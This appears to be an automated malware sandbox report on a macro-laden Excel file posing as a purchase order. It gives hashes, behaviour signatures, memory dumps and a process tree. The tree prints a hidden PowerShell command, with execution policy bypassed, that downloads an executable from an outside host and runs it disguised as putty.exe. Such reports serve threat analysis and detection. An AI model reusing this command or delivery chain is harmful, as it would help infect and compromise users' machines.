Overview

overview

10

Static

static

PO-9103829.xlsm

windows7_x64

10

PO-9103829.xlsm

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    142s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10-07-2020 07:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO-9103829.xlsm

  • Size

    92KB

  • MD5

    14133d71179bdf6257a18dc9808a92d5

  • SHA1

    8a74705278d267865391e10a104701eed9438fa2

  • SHA256

    15df82f880bb2cdf16b953132f7dd0a80195bd266a98d32b7965391c0f6c08da

  • SHA512

    f4e0c6d2921a2fa2fd0387c522e8c06161870b7c5ae7167b4e95136cdcdeb4ea14afa59e19c975fe57be1e86d4b39d3d264558e2721da4d108893787f0277b71

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://manikmeyah.net/wp-content/mu-plugins/unl.exe

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Program crash 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-9103829.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://manikmeyah.net/wp-content/mu-plugins/unl.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      PID:2316
      • C:\Users\Admin\AppData\Local\Temp\putty.exe
        "C:\Users\Admin\AppData\Local\Temp\putty.exe"
        3⤵
        • Executes dropped EXE
        PID:3812
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 868
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          • Program crash
          PID:3692

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3692-44-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-48-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-56-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-35-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-34-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-54-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-53-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-52-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-51-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-50-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-17-0x0000000005800000-0x0000000005801000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-8-0x0000000005040000-0x0000000005041000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-49-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-40-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-47-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-36-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-46-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-45-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-43-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-33-0x0000000005970000-0x0000000005971000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-55-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-42-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-41-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-37-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-38-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3692-39-0x0000000003870000-0x0000000003871000-memory.dmp

    Filesize

    4KB

    Download